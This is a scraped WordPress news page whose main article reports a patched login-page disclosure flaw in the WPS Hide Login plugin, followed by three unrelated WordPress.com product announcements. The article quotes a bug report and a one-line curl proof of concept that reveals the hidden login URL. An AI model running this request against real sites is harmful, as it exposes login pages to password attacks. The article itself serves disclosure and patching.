Connect with us

WORDPRESS

WordPress Security Plugin Exposes +1 Million Websites

Published

on

Main Article Image - WordPress Security Plugin Exposes +1 Million Websites

The WPS Hide Login WordPress plugin recently patched a vulnerability that exposes users secret login page. The vulnerability allows a malicious hacker to defeat the purpose of the plugin (of hiding the login page), which can exposes the site to an attack for unlocking the password and login.

Essentially, the vulnerability completely defeats the intended purpose of the plugin itself, which is to hide the WordPress login page.

WPS Hide Login

The WPS Hide Login security plugin defeats hacker attempts to gain access to a WordPress site by hiding the administrator login page and making the wp-admin directory inaccessible.

WPS Hide Login is used by over one million websites to add a deeper layer of security.

Defeating hackers and hacker bots that attack the default login page of a WordPress site doesn’t actually need a plugin. An easier way to accomplish the same thing is to install WordPress into a directory folder with a random name.

What happens is that the login page hacker bots will seek out the normal login page but it doesn’t exist at the expected URL location.

Instead of existing at /wp-login.php the login page is effectively hidden at /random-file-name/wp-login.php.

Login bots always assume that the WordPress login page is at the default location, so they never go looking for it at a different location.

The WPS Hide Login WordPress plugin is useful for sites that have already installed WordPress in the root, i.e. example.com/.

Report of Vulnerability

The vulnerability was publicly reported on the plugin’s support page.

A user of the plugin reported that if the main home page was redirected then adding a specific file name to the URL that redirects will expose the URL of the hidden login page.

This is how they explained it:

“For example with the following domain: sub.domain.com if domain.com redirects to sub.domain.com there is the following bypass:

Entering the URL domain.com and add /wp-admin/options.php then it redirects to sub.domain.com/changedloginurl and you see the login-url and could log in.”

Security Site Published a Proof of Concept

WPScan, a WordPress security organization published a proof of concept. A proof of concept is an explanation that shows that a vulnerability is real.

The security researchers published:

“The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
Proof of Concept

curl –referer “something” -sIXGET https://example.com/wp-admin/options.php
HTTP/2 302 ”

The United States government National Vulnerability Database rated the vulnerability as a high level exploit, giving it a score of 7.5 on a scale of 1 to 10, with a score of 10 representing the highest threat level.

WPS Hide Login Vulnerability Patched

The publishers of the WPS Hide Login plugin updated the plugin by patching the vulnerability.

The patch is contained in version 1.9.1.

According to the WPS Login Changelog:

“1.9.1
Fix : by-pass security issue allowing an unauthenticated user to get login page by setting a random referer string via curl request.

page by setting a random referer string via curl request.”

Users of the affected plugin may wish to consider updating to the latest version, 1.9.1, in order to effectively hide their login page.

Citations

US Government National Vulnerability Database

CVE-2021-24917 Detail

WPScan Report of WPS Hide Login Vulnerability

WPS Hide Login < 1.9.1 – Protection Bypass with Referer-Header

Plugin Report of Vulnerability

Bypass-SECURITY ISSUE!!!

Official Plugin Changelog

WPS Hide Login Changelog

Searchenginejournal.com

WORDPRESS

An Easier Way to Share Progress on Your Website – WordPress.com News

Published

on

An Easier Way to Share Progress on Your Website – WordPress.com News

We’re excited to announce Site Preview Links, a feature that will let you easily share a “Coming Soon” Business or eCommerce site.

Do you build sites for others? Have you ever struggled to coordinate and manage access to in-progress projects? How often do you have to help clients reset their passwords? We feel your pain, and we’re excited to announce Site Preview Links, a feature that will let you easily share a “Coming Soon” Business or eCommerce site.

Use Site Preview Links to Share Your Work

With Site Preview Links, you can generate a unique preview link for your in-progress Business or eCommerce site, allowing your team or clients to access the Coming Soon site without having to log in. This way, you can easily show off your work-in-progress and get feedback from your stakeholders without having to resend invites, update user roles, or reset passwords.

You can create and access the preview link directly from the Sites page:

You can then share the link with your team or client. When they access the preview link, they’ll bypass the Coming Soon screen and be able to view your site.

Site Preview Links is an easy-to-use feature that will save you time and hassle. It’s perfect for anyone who builds websites for others, whether you are an agency with a growing client roster, a contractor with just a handful of projects, or simply someone who knows a lot of people who need websites.

How Site Preview Links Work

WordPress.com uses a secure HMAC hashing algorithm to generate Preview Link that is unique across all sites. The possible number of unique hashes is 2256, which heavily exceeds the number of grains of sand in the world!

Users who access your site using the shared preview link can continue navigating through the site, as WordPress.com uses a browser cookie to preserve the link value for the user’s session.

The link won’t expire, but you can disable it anytime. Users who already have access to your site using the preview link won’t be able to access the site anymore once you disable the link.

If you change your mind, you can always enable the link again, and we will generate a new, unique, ready-to-share URL.

If you need help with Preview Links, check out our more detailed guide.

Build Your Next Site on WordPress.com

Try Preview Links today and see how it can help you save time and make your life easier. Your clients will be impressed with the convenience, and you’ll be able to get their feedback faster.

Preview Links are just one of the reasons WordPress.com is the best managed WordPress hosting on the planet alongside other features we released this year: the Sites page, SSH access, SSH keys, and our data center picker. If you are interested in more details, you can follow our Developer Blog.

What other feature would you find valuable? How could we make WordPress.com an even more powerful place to build a website? Feel free to leave a comment or submit your ideas in our short feature request form.


Join 96,866,969 other subscribers

Source link

Continue Reading

WORDPRESS

An Easy Path Over to WordPress.com – WordPress.com News

Published

on

An Easy Path Over to WordPress.com – WordPress.com News

If the recent Gumroad price change announcement has you considering a migration from Gumroad to WooCommerce, we’re here to welcome you with open arms. Changing eCommerce platforms may seem like a big hurdle to overcome, but we have an expert team in place to help you migrate your Gumroad store to the WordPress.com eCommerce Plan with WooCommerce.

With lower fees and transparent pricing, you’ll improve your margins and expand your earning potential. 

We’ve also created a tailored migration guide to walk merchants through importing from Gumroad to WooCommerce. This step-by-step process requires no technical expertise and will enable you to seamlessly transition your store.

When the import is complete, you’ll have a ready-to-go site with your content preloaded. Your customers will never know the difference. 

If you’re looking to get help moving from Gumroad, reach out now.


Join 96,859,720 other subscribers

Source link

Continue Reading

WORDPRESS

New WordPress.com Themes for January 2023 – WordPress.com News

Published

on

New WordPress.com Themes for January 2023 – WordPress.com News

Five beautiful new WordPress.com themes, including our new default theme, Twenty Twenty-Three.

The WordPress.com team is always working on new design ideas to bring your website to life. Below you’ll find the four newest themes that we’ve added to our library, with beautiful options for food-based businesses, podcasts, and bloggers.

To install any of the below themes, click the the name of the theme you like, which brings you right to the installation page. Then simply click the “Activate this design” button. You can also click “Open live demo,” which brings up a clickable, scrollable version of the theme for you to preview.

Premium themes are free to use for any user on a Premium plan or above, or can be purchased individually by those with free sites or Personal plans.

You can explore all of our themes by navigating to the “Themes” page, which is found under “Appearance” in the left-side menu of your WordPress.com dashboard. Or, just click here:


Twenty Twenty-Three is designed to take advantage of the new design tools introduced in WordPress 6.1.

With a clean, blank base as a starting point, this default theme includes ten diverse style variations created by members of the WordPress community.

Whether you want to build a complex or incredibly simple website, you can do it quickly and intuitively through the bundled styles or dive into creation and full customization yourself.

Click here to view a demo of this theme.


Tazza puts the spotlight on your products and your customers. This theme leverages Woo Commerce to provide you with intuitive product navigation and the patterns you need to master digital merchandising.

Click here to view a demo of this theme.


Calyx is a minimalist theme designed for single-page websites. Featuring a coming-soon pattern on the homepage, Calyx is a perfect choice to spread the word about the upcoming opening of a cafe, restaurant, or bar.

Click here to view a demo of this theme.


Muscat is a simple blogging theme with grid post templates and a centered post layout. Its geometric sans-serif typography contributes to a delightful, comfortable, and modern reading experience.

Click here to view a demo of this theme.


Loudness is a bold opinionated theme created with music education in mind. Use Site Editor tooling and relevant patterns to create a unique experience.

Click here to view a demo of this theme.


Stay tuned for more updates about new themes, patterns, blocks, and other exciting product updates! And be sure to click below to take a look at the entire showcase of themes we offer:


Join 96,853,745 other subscribers

Source link

Continue Reading

Trending

en_USEnglish